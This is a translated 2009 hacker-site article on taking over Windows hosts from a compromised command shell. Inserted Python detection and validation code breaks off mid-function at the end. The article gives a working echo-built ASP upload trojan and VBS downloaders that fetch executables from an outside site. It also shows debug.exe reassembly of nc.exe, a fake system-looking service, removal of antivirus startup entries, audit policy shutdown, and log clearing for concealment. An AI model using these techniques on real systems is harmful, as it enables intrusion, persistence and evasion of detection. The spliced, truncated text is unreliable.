Do All in Cmd Shell
Author: 佚名 (Anonymous), www.myhack58.com, MYHACK58:62200923303
Published: May 21, 2009

Foreword
Cmd Shell (command-line interaction) is an eternal topic for hackers; it has a long history and is still going strong.
This article introduces and summarizes some methods of controlling Windows systems from the command line. As far as possible, these methods use only the tools that ship with the system.

File transfer
For a cmd shell obtained through an overflow vulnerability, the biggest problem is how to upload files. Because of worm outbreaks, ports 139 and 445, which an ipc$ connection needs, are blocked by many routers. In addition, WinXP hardens ipc$ protection, so uploading files through ipc$ and the default shares is basically useless. ftp and tftp are two usable methods; both are well known and not covered here. There are three other familiar approaches, which I summarize here:

1. Writing an ASP Trojan with the echo command.
The precondition, of course, is that IIS is installed on the target host.
ASP Trojans are generally "bulky" and not suitable for writing to a file directly with echo, so here I offer a small one.
Given directly in echo form:

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring("s")),2:end with%^> >up.asp

Note that this is a single line with no carriage return in it.
The generated up.asp cannot be accessed with a browser; it can only be driven by the following script:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

Save it as up.vbs. Assuming the target IP is 123.45.67.89, up.asp is in the IIS virtual root directory, the file to upload is nc.exe and it should be saved as mm.exe after uploading, the corresponding command is:

cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe

Note that this command is run on the local command line; don't get that wrong.

In addition, uploading through IIS leaves log entries; remember to clear them.

2. Automatic download into the page cache.
For example:

start its:http://www.sometips.com/soft/ps.exe

Run the command above in the remote shell, and ps.exe is downloaded into the target host's page cache directory. Then:

cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5"
dir /s ps[1].exe

This gives the specific location of ps.exe (different on each host), for example:

Directory of C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\AB094JIT

2004-01-24  14:24        49,152 ps[1].exe
               1 File(s)        49,152 bytes

Finally:
copy AB094JIT\ps[1].exe c:\path\ps.exe
del AB094JIT\ps[1].exe

Additional notes:
For a backdoor shell started as a service, the user identity is generally System, and the web cache directory is then located as in the example above. If the shell's identity is not System, replace Default User with the corresponding user name.
This method starts an IE process; remember to kill it. If the shell runs as System, no window appears locally, so nothing is exposed.
In addition, using ms-its instead of its has exactly the same effect.

3. Echo a script that downloads web resources.
The ready-made tool is iGet.vbs. Here I give a version containing the necessary error handling.
Still in echo form:

@echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"^&web.status:.quit >>dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

Example: download ps.exe and save it under c:\path:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this is run in the remote shell.

4. Echo an encoding of any file, then restore it with a script plus debug.
The previous two approaches are not guaranteed to pass through a firewall. Moreover, unless you set up your own web server, a web resource generally comes as a compressed file; if the target host has no unzip tool, there is no choice. Then only the "killer" remains!

The echo command and the redirection operator can write characters with ASCII codes below 128, but not those at or above 128. Only by re-encoding the local file into displayable characters can it be written to the remote host easily. The first thing that comes to mind is base64, i.e. the encoding of e-mail attachments. But VBS does not support bit operations, so encoding and decoding are rather complex. More troublesome is that the script's ability to process files in binary stream mode is very poor. (ADODB.Stream can write files in stream mode, but I cannot construct the corresponding data type. A binary data stream can be converted to a string with the midb function, but not the other way round.) I spent two days and still could not solve this problem. If anyone can write an arbitrary sequence of bytes to a file with VBS or JS, please enlighten me.

With no way out, I resort to debug.exe. Many people know the principle, so I won't introduce it and give the encoding script directly:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """>>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf" _
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)" _
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll) _
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with" _
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with

Save it as echo.vbs. Assuming you want to upload nc.exe, enter on the local command line: cscript echo.vbs nc.exe

You can also simply drag the icon of the file to be transferred onto the script file's icon.
After a moment, nc.exe.bat is generated in the current directory. Opening it in Notepad or another editor, you see the following:

@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000">>debug.vbs
@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000">>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000">>debug.vbs
@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100">>debug.vbs

... (a number of lines omitted)

@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs

Select all, copy, switch to the remote command-line window, paste.
If the network is not very slow, the whole upload takes about 20 seconds.

Some points to note:
1. Transferring large files is unstable and may cause the shell to die, so the smaller the file the better. I recommend that the original file not exceed 100KB.
2. Before transferring a large file, you can first transfer a small one as a "warm-up", so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all transfers are finished, kill the ntvdm process for concealment.
3. Some cmd shells require two carriage returns after each command; nc.exe.bat cannot then be used directly.
4. The length of a single command is limited, so all the work cannot be done with one echo. Moreover, with the cmd shell provided by nc, slightly longer commands actually cause the shell to exit because of an overflow. You can change the 128 in the "i mod 128=0" statement to adjust the length of each echo command; the number of characters per echo is twice this number.
5. Decoding without a script is also possible. The purpose of the script is to reduce the amount of data transmitted, as a form of compression. If I have time, I will write a more complete script with better compression and added data verification.
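From the defender's side, every transfer trick in this section leaves a distinctive process command line: a script piped into debug.exe, start its: pointing at a URL, a .vbs launched with a URL argument, or an executable copied out of the IE cache with the [1].exe naming. The Python below is an added example, not part of the original article: it runs such rules over a few constructed sample process-creation records (the tab-separated user/parent/command-line layout is an assumption for this example, not any product's log format) and raises the severity when the parent is cmd.exe running as SYSTEM, the situation the article describes.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation records (user, parent image, command line),
# tab-separated. The layout is an assumption for this example, not a real log format.
SAMPLE_LOG = "\n".join("\t".join(r) for r in [
    ("SYSTEM", r"C:\WINNT\system32\cmd.exe",
     r'cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs'),
    ("SYSTEM", r"C:\WINNT\system32\cmd.exe", r"start its:http://www.sometips.com/soft/ps.exe"),
    ("SYSTEM", r"C:\WINNT\system32\cmd.exe",
     r"cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe"),
    ("alice", r"C:\WINNT\explorer.exe", r"notepad.exe c:\notes\todo.txt"),
    ("SYSTEM", r"C:\WINNT\system32\cmd.exe", r"copy AB094JIT\ps[1].exe c:\path\ps.exe"),
])

# One rule per transfer technique: (name, pattern over the command line, why it matters).
RULES: List[Tuple[str, "re.Pattern[str]", str]] = [
    ("debug_exe_reassembly", re.compile(r"\bdebug\.(exe|tmp)\b", re.I),
     "16-bit debug.exe driven from a script: a hex-encoded file is being rebuilt on disk"),
    ("its_protocol_fetch", re.compile(r"\bstart\s+(ms-)?its:\S+", re.I),
     "start its:/ms-its: URL: the browser cache is used as a download channel"),
    ("script_url_download", re.compile(r"\b[cw]script\b.*\.vbs\s+https?://", re.I),
     "a .vbs launched with a URL argument: xmlhttp/adodb.stream downloader"),
    ("ie_cache_exe_copy", re.compile(r"Temporary Internet Files|Content\.IE5|\[\d+\]\.exe", re.I),
     "executable copied out of the IE cache directory"),
]


def parse_record(line: str) -> Dict[str, str]:
    """Split one tab-separated record into user, parent image and command line."""
    user, parent, cmd = line.split("\t", 2)
    return {"user": user, "parent": parent, "cmd": cmd}


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run every rule over every record; a cmd.exe child running as SYSTEM is rated high."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(log_text.splitlines(), 1):
        if not raw.strip():
            continue
        rec = parse_record(raw)
        system_shell = rec["user"].upper() == "SYSTEM" and rec["parent"].lower().endswith("cmd.exe")
        for name, pattern, why in RULES:
            if pattern.search(rec["cmd"]):
                findings.append({"line": lineno, "rule": name, "why": why,
                                 "severity": "high" if system_shell else "medium",
                                 "cmd": rec["cmd"]})
    return findings


def rules_hit(log_text: str) -> List[str]:
    """Names of the rules that fired, in record order."""
    return [str(f["rule"]) for f in scan(log_text)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} [{f['severity']}] {f['rule']}: {f['why']}")
```

Run on the sample, four of the five records fire (the notepad line does not), all at high severity because they come from a SYSTEM cmd.exe. The rules are deliberately narrow; debug.exe and the its: handler have almost no legitimate use on a server, which is what makes them cheap, low-noise indicators.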

Once files can be uploaded, everything is of course easy, but many operations are more convenient with Windows' built-in tools. Whenever you need a tool, don't forget Windows itself.

System configuration
This section covers three areas: the registry, services and Group Policy.

First the registry. Many command-line registry tools are interactive, and a shell produced by an overflow generally cannot redirect its input/output streams again, so they cannot be used.
Fortunately, the regedit.exe that ships with the system is enough.

1. Reading the registry
First export the key you want to query, then view it with type, for example:

C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

C:\>type 1.reg | find "PortNumber"
"PortNumber"=dword:00000d3d

C:\>del 1.reg

So the Terminal Services port is 3389 (hexadecimal d3d).

2. Modifying/deleting registry entries
First echo a reg file, then import it, for example:

echo Windows Registry Editor Version 5.00 >1.reg
echo. >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo "TelnetPort"=dword:00000913 >>1.reg
echo "NTLM"=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg

This sets the telnet service port to 2323 (hexadecimal 913) and NTLM authentication to 1.

To delete a key, prefix its name with a minus sign, for example:

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

To delete a value, put a minus sign after the equals sign, for example:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-

3. Accessing the registry with an inf file
The three registry operations above can also be done with the following inf file:

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun

Save it as c:\path\reg.inf, then "install" it with the following command:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf

Some points to note:
1. [Version] and [DefaultInstall] are mandatory, and at least one of AddReg and DelReg must be present. My_AddReg_Name and My_DelReg_Name can be named freely.
0x00010001 denotes the REG_DWORD data type; 0x00000000, or omitting the field (keeping the comma), denotes REG_SZ (string); 0x00020000 denotes REG_EXPAND_SZ.
2323 can also be written as 0x913.
For detailed information on inf files, refer to the DDK documentation.
2. InstallHinfSection is case-sensitive. Between it and setupapi there is only a comma, with no spaces.
128 indicates that the path is given; for the other values and meanings of this parameter, see MSDN.
Note in particular that the last parameter must be the full path of the inf file, not a relative path.
3. Entries in inf files are not case-sensitive.

Next, services. To start or stop a service, the net command suffices. But to add or delete services you need tools such as SC, instsrv.exe or xnet.exe, and the system does not ship with them (XP and 2003 do include SC). Importing the registry works, but not well, for reasons given later. So we rely on inf files again.

Adding a service:

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Provides support for Internet Information Services management.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe

Save it as inetsvr.inf, then:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf

This example adds a service named inetsvr, which looks a lot like a built-in system service, doesn't it?

Some points to note:
1. The last four items are:
Service type: 0x10 for a service running in its own process, 0x20 for a shared-process service such as svchost;
Start type: 0 loaded at system boot, 1 loaded at OS initialization, 2 started automatically by the SCM (Service Control Manager), 3 manual start, 4 disabled.
Note that 0 and 1 can only be used for drivers.
Error control: 0 ignore, 1 continue with a warning, 2 switch to the LastKnownGood configuration, 3 blue screen.
Service program location: %11% denotes the system32 directory, %10% the system directory (WINNT or Windows), %12% the driver directory system32\drivers. For other values see the DDK. You can also skip the variables and use the full path directly.
These four items are mandatory.
2. Besides the six items in the example, there are LoadOrderGroup, Dependencies and so on. They are not commonly used, so they are not introduced.
3. There are two commas after inetsvr because an uncommonly used parameter, flags, is omitted between them.
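To check an inf before "installing" it with rundll32, here is a small validator, added as an example and not taken from the article, that enforces exactly the rules stated above for both the registry inf and the service inf: [Version] with a Signature, [DefaultInstall] with AddReg/DelReg or [DefaultInstall.Services] with AddService/DelService, the three REG type flags, the four mandatory service items, StartType 0/1 only for drivers (ServiceType 0x1 or 0x2), ErrorControl 0 to 3, and a ServiceBinary that uses %10%/%11%/%12% or a full path. The two good sample inf texts are the article's own; the "bad" one is constructed.

```python
import re
from typing import Dict, List, Optional

# REG type flags as described in the article (lower-case keys; "" = flag omitted).
REG_FLAGS = {"0x00010001": "REG_DWORD", "0x00000000": "REG_SZ", "": "REG_SZ",
             "0x00020000": "REG_EXPAND_SZ"}
DRIVER_TYPES = {0x1, 0x2}   # kernel / file-system driver: the only types allowed StartType 0 or 1


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Parse an INF into {section name (lower-case): [non-comment lines]}; ';' starts a comment."""
    sections: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _values(section: List[str], key: str) -> List[str]:
    """All values of key in a section (directives such as AddReg may repeat)."""
    return [v.strip() for k, _, v in (l.partition("=") for l in section) if k.strip().lower() == key.lower()]


def _int(s: str) -> Optional[int]:
    try:
        return int(s, 0)          # accepts 0x10 as well as 2
    except ValueError:
        return None


def _check_service(name: str, body: List[str]) -> List[str]:
    probs: List[str] = []
    vals = {k: (_values(body, k) or [None])[0] for k in ("ServiceType", "StartType", "ErrorControl", "ServiceBinary")}
    for k, v in vals.items():
        if v is None:
            probs.append(f"service {name}: {k} is required")
    stype, start, err = (_int(vals[k] or "") for k in ("ServiceType", "StartType", "ErrorControl"))
    if start is not None and start not in range(5):
        probs.append(f"service {name}: StartType {start} is not 0-4")
    if start in (0, 1) and stype not in DRIVER_TYPES:
        probs.append(f"service {name}: StartType {start} is only valid for drivers (ServiceType 0x1/0x2)")
    if err is not None and err not in range(4):
        probs.append(f"service {name}: ErrorControl {err} is not 0-3")
    binary = vals["ServiceBinary"] or ""
    if binary and not re.match(r"^(%1[012]%\\|[A-Za-z]:\\)", binary):
        probs.append(f"service {name}: ServiceBinary should start with %10%/%11%/%12% or a full path")
    return probs


def validate_inf(text: str) -> List[str]:
    """Return a list of problems; an empty list means the inf satisfies the rules above."""
    s = parse_inf(text)
    problems: List[str] = []
    if "version" not in s or not _values(s["version"], "Signature"):
        problems.append("[Version] with a Signature line is required")
    reg, svc = s.get("defaultinstall"), s.get("defaultinstall.services")
    if reg is None and svc is None:
        problems.append("[DefaultInstall] or [DefaultInstall.Services] is required")
    if reg is not None:
        add, dele = _values(reg, "AddReg"), _values(reg, "DelReg")
        if not add and not dele:
            problems.append("[DefaultInstall] needs at least one AddReg or DelReg")
        for sec in add + dele:
            if sec.lower() not in s:
                problems.append(f"referenced section [{sec}] is missing")
        for sec in add:
            for line in s.get(sec.lower(), []):
                fields = [f.strip() for f in line.split(",")]
                flag = fields[3].lower() if len(fields) > 3 else ""
                if flag not in REG_FLAGS:
                    problems.append(f"[{sec}] {fields[2] if len(fields) > 2 else '?'}: unsupported type flag {flag!r}")
    if svc is not None:
        adds, dels = _values(svc, "AddService"), _values(svc, "DelService")
        if not adds and not dels:
            problems.append("[DefaultInstall.Services] needs at least one AddService or DelService")
        for entry in adds:
            fields = [f.strip() for f in entry.split(",")]
            if len(fields) < 3:   # name,flags,section: the flags field may be empty but its comma stays
                problems.append(f"AddService={entry}: expected name,,install-section")
                continue
            body = s.get(fields[2].lower())
            if body is None:
                problems.append(f"service {fields[0]}: install section [{fields[2]}] is missing")
            else:
                problems += _check_service(fields[0], body)
    return problems


# The article's two inf files, and a constructed one that breaks three of the rules.
REG_INF = r"""[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
"""
INETSVR_INF = r"""[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
"""
BAD_INF = r"""[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=badsvc,,bad_install
[bad_install]
ServiceType=0x10
StartType=0
ErrorControl=7
"""
```

validate_inf(REG_INF) and validate_inf(INETSVR_INF) return no problems; BAD_INF is reported for the missing ServiceBinary, the boot-time StartType on a Win32 service, and the out-of-range ErrorControl.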

Deleting a service:

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
DelService=inetsvr

Very simple, isn't it?

Of course, you can also achieve this by importing the registry, but inf has its own advantages.
1. Export the registry entry of a service that ships with the system and you will find its execution path looks like this:
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
  00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
The readability is very poor. It is actually %SystemRoot%\system32\tlntsvr.exe, but the data type is REG_EXPAND_SZ. When adding a service by importing the registry manually, defining ImagePath this way is obviously very inconvenient. Using REG_SZ instead has a problem: environment variables cannot be used, so only a full path works. An inf file has none of these problems: ServiceBinary, i.e. ImagePath, automatically becomes REG_EXPAND_SZ.
2. Most importantly, as with SC and similar tools, the effect of an inf file is immediate, whereas after importing a reg file a restart is needed before it takes effect.
3. The inf file automatically adds a Security subkey to the service's registry entry, so that it looks more like a built-in service.
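The hex(2) blob above is easy to decode mechanically. As an added example (not from the article), the Python below parses regedit export text: it joins the backslash-wrapped lines, decodes dword, string, hex(2) (REG_EXPAND_SZ, UTF-16LE) and hex(7) (REG_MULTI_SZ) values, and records [-KEY] and "Name"=- deletions, so the type 1.reg | find "PortNumber" step from the registry section becomes a lookup that returns decoded data. The sample .reg is constructed from the values shown in this article; the TlntSvr key name is the real telnet service key. A file regedit itself wrote is UTF-16 with a BOM, so open it with encoding="utf-16" before passing the text in.

```python
import re
from typing import Dict, List, Tuple

RegValue = Tuple[str, object]   # (registry type name, decoded value)


def _join_continuations(text: str) -> List[str]:
    """Undo regedit's line wrapping: a trailing '\\' continues the value on the next line."""
    lines: List[str] = []
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        lines.append(pending + line)
        pending = ""
    return lines


def decode_value(data: str) -> RegValue:
    """Decode the right-hand side of a .reg value line."""
    if data == "-":
        return ("DELETE", None)
    if data.startswith("dword:"):
        return ("REG_DWORD", int(data[len("dword:"):], 16))
    if data.startswith('"') and data.endswith('"'):
        return ("REG_SZ", data[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
    m = re.fullmatch(r"hex(?:\((\d+)\))?:(.*)", data)
    if m:
        kind = int(m.group(1) or "3")          # bare "hex:" is REG_BINARY (type 3)
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        if kind == 2:                          # REG_EXPAND_SZ: UTF-16LE, NUL-terminated
            return ("REG_EXPAND_SZ", raw.decode("utf-16-le").rstrip("\x00"))
        if kind == 7:                          # REG_MULTI_SZ: UTF-16LE strings separated by NUL
            return ("REG_MULTI_SZ", [s for s in raw.decode("utf-16-le").split("\x00") if s])
        return ("REG_BINARY" if kind == 3 else f"hex({kind})", raw)
    return ("UNKNOWN", data)


def parse_reg(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Parse .reg text (already decoded from UTF-16) into {key path: {value name: (type, data)}}."""
    keys: Dict[str, Dict[str, RegValue]] = {}
    current = None
    for line in _join_continuations(text.lstrip("\ufeff")):
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        m = re.fullmatch(r"\[(-?)(.+)\]", line)
        if m:
            current = m.group(2)
            keys.setdefault(current, {})
            if m.group(1):                     # [-KEY] deletes the whole key on import
                keys[current]["(key)"] = ("DELETE_KEY", None)
            continue
        m = re.fullmatch(r'(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)', line)
        if m and current is not None:
            name = "(Default)" if m.group(2) else m.group(1).replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = decode_value(m.group(3))
    return keys


def find_value(text: str, value_name: str) -> List[Tuple[str, str, object]]:
    """Like 'type 1.reg | find "PortNumber"', but returning (key, type, decoded data)."""
    return [(key, typ, data) for key, values in parse_reg(text).items()
            for name, (typ, data) in values.items() if name.lower() == value_name.lower()]


# Constructed sample export using the values shown in the article.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"DisplayName"="Telnet"
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
  00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
"""

if __name__ == "__main__":
    for key, typ, data in find_value(SAMPLE_REG, "ImagePath"):
        print(key, typ, data)
```

find_value(SAMPLE_REG, "PortNumber") yields 3389 as an integer rather than dword:00000d3d, and the ImagePath comes back as the readable %SystemRoot%\system32\tlntsvr.exe. Reviewing an exported service key this way also makes a REG_SZ ImagePath stand out, which the text above explains is the mark of a service added by hand-written reg import.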

In addition, AddService and DelService, as well as AddReg and DelReg, can be used at the same time and repeatedly, so multiple services and registry entries can be added and deleted at once. See the DDK for details.

Finally, Group Policy. Group Policy is an important means of establishing a secure Windows environment, especially in a Windows domain. A good system administrator should be able to master and apply Group Policy skillfully. In the windowed interface, Group Policy is accessed with gpedit.msc; on the command line, with secedit.exe.

The secedit command syntax:
secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
The functions of the 5 commands are, respectively: analyze Group Policy, configure Group Policy, export Group Policy, verify template syntax and refresh Group Policy. On XP/2003, secedit /refreshpolicy is replaced by gpupdate. The specific syntax of these commands can be seen on the command line.

Unlike registry access, which only needs a reg file, accessing Group Policy needs not only a template file (also an inf) but also a security database file (sdb). To modify Group Policy, you must first import the template into the security database, then refresh Group Policy by applying that database. An example:

Suppose I want to set the minimum password length to 6 and enable "password must meet complexity requirements"; first write a template:

[version]
signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1

Save it as gp.inf, then import it:

secedit /configure /db gp.sdb /cfg gp.inf /quiet

When this command completes, a gp.sdb is generated in the current directory; it is an "intermediate product" and can be deleted.
The /quiet parameter means "quiet mode", producing no log. But in my testing this parameter does not seem to work on 2000sp4, while XP is fine. The log is always saved in %windir%\security\logs\scesrv.log. You can also specify your own log so that you can delete it afterwards. For example:

secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
del gp.*

In addition, before importing a template, you can first check whether its syntax is correct:

secedit /validate gp.inf

How, then, do you find out the specific syntax? Look it up on MSDN, of course. There is also a lazy way: the system ships with some security templates in the %windir%\security\templates directory. Open them and you will find the syntax of most commonly used security settings, which is easy to understand.

Another example: turn off all audit policies. Audited events are recorded in the "Security" log of Event Viewer.
Echo version:

echo [version] >1.inf
echo signature="$CHICAGO$" >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
echo AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
echo AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*

Perhaps someone will ask: isn't Group Policy stored in the registry? Why not modify the registry directly? Because not all Group Policy is saved in the registry; the "audit policy", for instance, is not. You can use regsnap to compare registry changes before and after modifying the policy; my test result is that nothing changed. Only the "Administrative Templates" section is entirely registry-based. Besides, once you know the specific location, none of these methods is complicated.

For example, XP and 2003 add a policy "Sharing and security model for local accounts" under "Local Policies" > "Security Options". The XP default is "Guest only". This is why connecting to XP's ipc$ with an administrator account still gives only Guest permissions. You can change it to "Classic" by importing a reg file:

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

The corresponding inf should be:

echo [version] >1.inf
echo signature="$CHICAGO$" >>1.inf
echo [Registry Values] >>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*

Reading Group Policy on the command line.
The system's default security database is %windir%\security\database\secedit.sdb; export it to an inf file:

secedit /export /cfg gp.inf /log 1.log

Without the /db parameter, the default database is used. Then look at gp.inf.

However, this only gets part of Group Policy, namely the "Windows Settings" part. Moreover, a policy that is not configured is not exported. For example, "Rename administrator account" appears in the inf file as NewAdministratorName="xxx" only when it has been defined. Group Policy that cannot be exported can only be obtained by accessing the registry.

This method does not work on XP and 2003: it exports, but the content is basically empty, for unknown reasons. According to the official information, XP and 2003 display Group Policy with RSoP (Resultant Set of Policy). The corresponding command-line tool is gpresult. However, it reports the Group Policy applied from the domain at system startup; on a standalone machine the test result is still "empty". So, if you want to know for certain whether a Group Policy is set, the only way is to write an inf first, run secedit /analyze, and then look at the log.
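Templates like the ones above are also what a defender wants to review, because the same mechanism that hardens a host can switch its auditing off. This added example (not from the article) parses a secedit template with Python's configparser and reports the weakenings discussed in this section: audit categories set to 0, a MinimumPasswordLength below a baseline (8 here, an assumed review value), PasswordComplexity other than 1, and a ForceGuest registry value of 0. The sample templates are constructed from the article's own settings; the same function can be run on the output of secedit /export.

```python
import configparser
from typing import Dict, List

AUDIT_LEVELS = {0: "no auditing", 1: "success", 2: "failure", 3: "success and failure"}
MIN_PASSWORD_LENGTH = 8   # assumed review baseline, not a value from the article


def load_template(text: str) -> configparser.ConfigParser:
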